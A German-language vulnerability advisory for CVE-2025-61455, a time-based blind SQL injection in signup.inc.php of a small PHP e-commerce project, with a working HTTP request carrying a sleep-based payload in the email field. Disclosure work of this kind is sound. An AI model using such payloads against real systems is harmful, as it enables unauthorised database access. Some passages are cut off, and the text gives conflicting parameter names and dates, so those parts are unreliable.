
Öffentliche Offenlegung und Proof-of-Concept für CVE-2025-61455, eine kritische SQL-Injection im E-Commerce-Projekt v1.0, einschließlich technischer Details, PoC und Empfehlungen zur Schadensbegrenzung.
Offenlegungsdatum: 14. Oktober 2025
CVE-ID: CVE-2025-61455
Schweregrad: KRITISCH (CVSS 9.8)
Eine kritische SQL-Injection-Schwachstelle besteht im E-commerce Project v1.0, insbesondere im Endpunkt signup.inc.php. Die Anwendung übernimmt unsanitisierte Benutzereingaben direkt in SQL-Abfragen, wodurch nicht authentifizierte Angreifer die Authentifizierung umgehen und beliebige SQL-Befehle ausführen können.
Diesem Problem wurde die Kennung CVE-2025-61455 zugewiesen. Zum Zeitpunkt der öffentlichen Offenlegung war kein offizieller Patch verfügbar.
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpDie Anwendung verwendet unsanitisierte Eingaben direkt in SQL-Abfragen, ohne Eingabevalidierung oder Prepared Statements. Die Schwachstelle besteht im Parameter aid der Datei signup.inc.php.
Ein Angreifer kann bösartigen SQL-Code über den E-Mail-Parameter injizieren, was zeitbasierte Blind-SQL-Injection-Angriffe ermöglicht.
Beispiel für ein verwundbares Codemuster:
$query = "SELECT * FROM table WHERE email='$email'";
Dies ermöglicht Injection-Payloads, die die Abfragelogik manipulieren und sensible Daten extrahieren können.
| CWE-ID | Titel |
|---|---|
| CWE-89 | Fehlerhafte Neutralisierung spezieller Elemente, die in einem SQL-Befehl verwendet werden |
| Score | Schweregrad | Vektor-String |
|---|---|---|
| 9.8 | KRITISCH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Eine erfolgreiche Ausnutzung könnte Folgendes zur Folge haben:
git clone https://github.com/Bhabishya-123/E-commerce.git
Verwenden Sie XAMPP/LAMP, um das Projekt bereitzustellen, und navigieren Sie zu:
http://localhost/e-commerce-main/includes/signup.inc.php
Senden Sie die folgende bösartige HTTP-Anfrage:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
Erklärung:
Der E-Mail-Parameter enthält einen zeitbasierten SQL-Injection-Payload: '+(select*from(select(sleep(20)))a)+'
Wenn die Anwendung die Antwort um 20 Sekunden verzögert, war die SQL-Injection erfolgreich.
mysqli_prepare() oder PDO).| Ereignis | Datum |
|---|---|
| Schwachstelle entdeckt | 16. September 2025 |
| Öffentliche Offenlegung | 13. Oktober 2025 |
| Patch verfügbar | ❌ Zum Zeitpunkt der Offenlegung nicht verfügbar |
Diese Schwachstelle wurde entdeckt und verantwortungsvoll offengelegt von:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 Dieses Advisory wird unabhängig veröffentlicht, da keine Reaktion des Anbieters erfolgte.